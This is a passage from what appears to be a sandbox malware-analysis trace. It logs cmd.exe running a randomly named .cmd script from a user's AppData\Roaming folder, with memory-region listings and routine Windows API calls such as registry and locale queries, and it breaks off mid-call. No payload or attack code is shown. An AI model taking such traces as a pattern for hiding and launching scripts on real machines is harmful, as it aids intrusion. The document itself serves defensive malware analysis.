successfully.\r\n") returned 39 [0116.401] SetLastError (dwErrCode=0x0) [0116.402] LocalFree (hMem=0x82040) returned 0x0 [0116.402] __iob_func () returned 0x76b32900 [0116.402] _fileno (_File=0x76b32920) returned 1 [0116.402] _errno () returned 0x3107d8 [0116.402] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.402] _errno () returned 0x3107d8 [0116.402] GetFileType (hFile=0x7) returned 0x2 [0116.402] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0116.402] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1afb58 | out: lpMode=0x1afb58) returned 1 [0116.402] __iob_func () returned 0x76b32900 [0116.402] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0116.402] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0116.402] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x821f8*, nNumberOfCharsToWrite=0x27, lpNumberOfCharsWritten=0x1afb80, lpReserved=0x0 | out: lpBuffer=0x821f8*, lpNumberOfCharsWritten=0x1afb80*=0x27) returned 1 [0116.405] exit (_Code=0) Process: id = "54" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16720" os_pid = "0xe2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "49" os_parent_pid = "0xde8" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8093 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8094 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8095 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8096 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 8097 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 8098 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8099 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8100 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 8101 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 8102 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 8380 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8381 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8382 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8383 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 8384 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 8385 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 8386 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8387 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 8388 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8389 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8390 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8391 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 8392 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8393 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 8394 start_va = 0x1f0000 end_va = 0x2b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 8395 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8396 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8397 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 8398 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 8399 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 8400 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 8401 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 8402 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 8403 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 8449 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8450 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8451 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8452 start_va = 0x2d0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 8453 start_va = 0x1310000 end_va = 0x15defff entry_point = 0x1310000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 86 os_tid = 0xe30 [0116.625] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efd24 | out: lpSystemTimeAsFileTime=0x1efd24*(dwLowDateTime=0x82d2f0e0, dwHighDateTime=0x1d440a9)) [0116.625] GetCurrentProcessId () returned 0xe2c [0116.626] GetCurrentThreadId () returned 0xe30 [0116.626] GetTickCount () returned 0x27a9b [0116.626] QueryPerformanceCounter (in: lpPerformanceCount=0x1efd1c | out: lpPerformanceCount=0x1efd1c*=17341477887) returned 1 [0116.626] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0116.626] __set_app_type (_Type=0x1) [0116.626] __p__fmode () returned 0x76b331f4 [0116.626] __p__commode () returned 0x76b331fc [0116.626] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0116.626] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0116.627] GetCurrentThreadId () returned 0xe30 [0116.627] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe30) returned 0x38 [0116.627] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0116.627] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0116.627] SetThreadUILanguage (LangId=0x0) returned 0x409 [0116.627] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0116.627] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efcb4 | out: phkResult=0x1efcb4*=0x0) returned 0x2 [0116.627] VirtualQuery (in: lpAddress=0x1efceb, lpBuffer=0x1efc84, dwLength=0x1c | out: lpBuffer=0x1efc84*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0116.627] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efc84, dwLength=0x1c | out: lpBuffer=0x1efc84*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0116.627] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efc84, dwLength=0x1c | out: lpBuffer=0x1efc84*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0116.627] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efc84, dwLength=0x1c | out: lpBuffer=0x1efc84*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0116.627] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efc84, dwLength=0x1c | out: lpBuffer=0x1efc84*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0116.627] GetConsoleOutputCP () returned 0x1b5 [0116.627] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0116.627] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0116.627] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.627] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0116.628] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.628] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0116.628] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.628] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0116.628] _get_osfhandle (_FileHandle=0) returned 0x3 [0116.628] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0116.628] _get_osfhandle (_FileHandle=0) returned 0x3 [0116.628] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0116.628] GetEnvironmentStringsW () returned 0x3a0150* [0116.628] FreeEnvironmentStringsW (penv=0x3a0150) returned 1 [0116.628] GetEnvironmentStringsW () returned 0x3a0150* [0116.629] FreeEnvironmentStringsW (penv=0x3a0150) returned 1 [0116.629] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eec24 | out: phkResult=0x1eec24*=0x40) returned 0x0 [0116.629] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eec2c, lpData=0x1eec30, lpcbData=0x1eec28*=0x1000 | out: lpType=0x1eec2c*=0x0, lpData=0x1eec30*=0x0, lpcbData=0x1eec28*=0x1000) returned 0x2 [0116.629] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eec2c, lpData=0x1eec30, lpcbData=0x1eec28*=0x1000 | out: lpType=0x1eec2c*=0x4, lpData=0x1eec30*=0x1, lpcbData=0x1eec28*=0x4) returned 0x0 [0116.629] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eec2c, lpData=0x1eec30, lpcbData=0x1eec28*=0x1000 | out: lpType=0x1eec2c*=0x0, lpData=0x1eec30*=0x1, lpcbData=0x1eec28*=0x1000) returned 0x2 [0116.629] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eec2c, lpData=0x1eec30, lpcbData=0x1eec28*=0x1000 | out: lpType=0x1eec2c*=0x4, lpData=0x1eec30*=0x0, lpcbData=0x1eec28*=0x4) returned 0x0 [0116.629] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eec2c, lpData=0x1eec30, lpcbData=0x1eec28*=0x1000 | out: lpType=0x1eec2c*=0x4, lpData=0x1eec30*=0x40, lpcbData=0x1eec28*=0x4) returned 0x0 [0116.629] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eec2c, lpData=0x1eec30, lpcbData=0x1eec28*=0x1000 | out: lpType=0x1eec2c*=0x4, lpData=0x1eec30*=0x40, lpcbData=0x1eec28*=0x4) returned 0x0 [0116.629] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eec2c, lpData=0x1eec30, lpcbData=0x1eec28*=0x1000 | out: lpType=0x1eec2c*=0x0, lpData=0x1eec30*=0x40, lpcbData=0x1eec28*=0x1000) returned 0x2 [0116.629] RegCloseKey (hKey=0x40) returned 0x0 [0116.629] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eec24 | out: phkResult=0x1eec24*=0x40) returned 0x0 [0116.629] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eec2c, lpData=0x1eec30, lpcbData=0x1eec28*=0x1000 | out: lpType=0x1eec2c*=0x0, lpData=0x1eec30*=0x40, lpcbData=0x1eec28*=0x1000) returned 0x2 [0116.629] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eec2c, lpData=0x1eec30, lpcbData=0x1eec28*=0x1000 | out: lpType=0x1eec2c*=0x4, lpData=0x1eec30*=0x1, lpcbData=0x1eec28*=0x4) returned 0x0 [0116.629] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eec2c, lpData=0x1eec30, lpcbData=0x1eec28*=0x1000 | out: lpType=0x1eec2c*=0x0, lpData=0x1eec30*=0x1, lpcbData=0x1eec28*=0x1000) returned 0x2 [0116.629] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eec2c, lpData=0x1eec30, lpcbData=0x1eec28*=0x1000 | out: lpType=0x1eec2c*=0x4, lpData=0x1eec30*=0x0, lpcbData=0x1eec28*=0x4) returned 0x0 [0116.629] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eec2c, lpData=0x1eec30, lpcbData=0x1eec28*=0x1000 | out: lpType=0x1eec2c*=0x4, lpData=0x1eec30*=0x9, lpcbData=0x1eec28*=0x4) returned 0x0 [0116.629] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eec2c, lpData=0x1eec30, lpcbData=0x1eec28*=0x1000 | out: lpType=0x1eec2c*=0x4, lpData=0x1eec30*=0x9, lpcbData=0x1eec28*=0x4) returned 0x0 [0116.629] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eec2c, lpData=0x1eec30, lpcbData=0x1eec28*=0x1000 | out: lpType=0x1eec2c*=0x0, lpData=0x1eec30*=0x9, lpcbData=0x1eec28*=0x1000) returned 0x2 [0116.629] RegCloseKey (hKey=0x40) returned 0x0 [0116.629] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88635c [0116.629] srand (_Seed=0x5b88635c) [0116.629] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd\"" [0116.629] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd\"" [0116.629] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0116.630] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a19b8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0116.630] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0116.630] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0116.630] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0116.630] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0116.630] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0116.630] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0116.630] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0116.630] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0116.630] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0116.630] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0116.630] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0116.630] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0116.630] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0116.630] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef9f0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0116.630] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef9f0, lpFilePart=0x1ef9ec | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1ef9ec*="Desktop") returned 0x18 [0116.630] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0116.631] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef76c | out: lpFindFileData=0x1ef76c) returned 0x39ffe0 [0116.631] FindClose (in: hFindFile=0x39ffe0 | out: hFindFile=0x39ffe0) returned 1 [0116.631] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef76c | out: lpFindFileData=0x1ef76c) returned 0x39ffe0 [0116.631] FindClose (in: hFindFile=0x39ffe0 | out: hFindFile=0x39ffe0) returned 1 [0116.631] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef76c | out: lpFindFileData=0x1ef76c) returned 0x39ffe0 [0116.631] FindClose (in: hFindFile=0x39ffe0 | out: hFindFile=0x39ffe0) returned 1 [0116.631] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0116.631] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0116.631] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0116.631] GetEnvironmentStringsW () returned 0x3a0150* [0116.631] FreeEnvironmentStringsW (penv=0x3a0150) returned 1 [0116.631] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0116.634] GetConsoleOutputCP () returned 0x1b5 [0116.634] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0116.634] GetUserDefaultLCID () returned 0x409 [0116.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0116.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efb30, cchData=128 | out: lpLCData="0") returned 2 [0116.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efb30, cchData=128 | out: lpLCData="0") returned 2 [0116.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efb30, cchData=128 | out: lpLCData="1") returned 2 [0116.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0116.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0116.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0116.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0116.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0116.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0116.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0116.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0116.635] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0116.635] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0116.636] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0116.637] GetConsoleTitleW (in: lpConsoleTitle=0x3a01e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0116.637] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0116.637] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0116.637] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0116.637] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0116.640] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd", _String2=")") returned 58 [0116.640] _wcsicmp (_String1="FOR", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd") returned 3 [0116.640] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd") returned 3 [0116.640] _wcsicmp (_String1="IF", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd") returned 6 [0116.640] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd") returned 6 [0116.640] _wcsicmp (_String1="REM", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd") returned 15 [0116.641] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd") returned 15 [0116.641] GetConsoleTitleW (in: lpConsoleTitle=0x1ef828, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0116.641] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0116.642] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0116.642] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ef5e4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1ef5dc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ef5dc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0116.642] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0116.642] SetErrorMode (uMode=0x0) returned 0x0 [0116.642] SetErrorMode (uMode=0x1) returned 0x0 [0116.642] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.", nBufferLength=0x208, lpBuffer=0x3adc08, lpFilePart=0x1ef348 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy", lpFilePart=0x1ef348*="vMfCCeRYkvQy") returned 0x2d [0116.642] SetErrorMode (uMode=0x0) returned 0x1 [0116.643] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.") returned 1 [0116.643] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0116.647] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0116.648] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd", fInfoLevelId=0x1, lpFindFileData=0x1ef0e4, 